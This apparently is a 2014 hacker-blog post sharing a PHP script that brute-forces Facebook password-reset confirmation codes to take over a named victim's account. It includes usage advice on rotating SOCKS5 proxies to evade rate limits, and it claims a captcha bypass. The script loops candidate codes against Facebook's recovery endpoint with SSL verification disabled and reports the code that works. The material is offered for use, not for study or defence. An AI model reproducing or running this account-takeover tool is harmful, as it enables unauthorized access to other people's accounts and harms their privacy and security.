[PHP] Facebook 0day Crack Reset Code
by mauritania attacker(anonghost)
First of All Read Description inside the PHP Code so you can get the idea how to use it correctly \!/
Note: Change the word TARGET by The Victim Facebook ID N° and good chance \!/ ^_^
PHP CODE :
/*
[+] Facebook Code Security Cracker
[+] Coded By : Mauritania Attacker
[+] GreetZ : All AnonGhost MemberZ
[+] FuCk Priv888888888888888888888
~~HACKING IS ART OF EXPLOITATION~~
<3 <3 <3 I'm not educated , I hate school , Hacking is my life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
// How to use: Restore your victim account and better choose the email option :p , and the rest is to use your mind \!/
I suggest you to use an auto rotating proxy after each 2 minutes so you won't get banned :D , i've bypassed already the captcha
security and cookies ,so facebook won't let you try many attempts so proxy is the solution !
you still can add a proxy socks v5 option in Curl only two lines :
curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
You can edit my script and try to develop it more if you have some ideas you are free , but don't forget the Copyright wkwkwkwkwkwk xd <3
Sharing is Caring \!/
Sorry my english is bad and i'm lazy xD !
*/
@set_time_limit(0);
echo "";
$user = explode("\r\n", $_POST['code']);
if($_POST['scan'])
{
foreach($user as $code)
{
// Curl Function ^_^
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u=TARGET&n={$code}");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
$check = curl_exec($ch);
if(eregi("password_new", $check)) //Keyword Good Response ^_^
{
echo "{$code} => Facebook Confirmation Code Found ^_^
";
}
else
{
echo "{$code} => Incorrect Code Trying More...
";
}
curl_close($ch);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
?>
Mauritania attacker
meet hackers
www.meethackers.com
[PHP] Facebook 0day Crack Reset Code
Reviewed by
0x000216
on
Wednesday, August 13, 2014
Rating:
5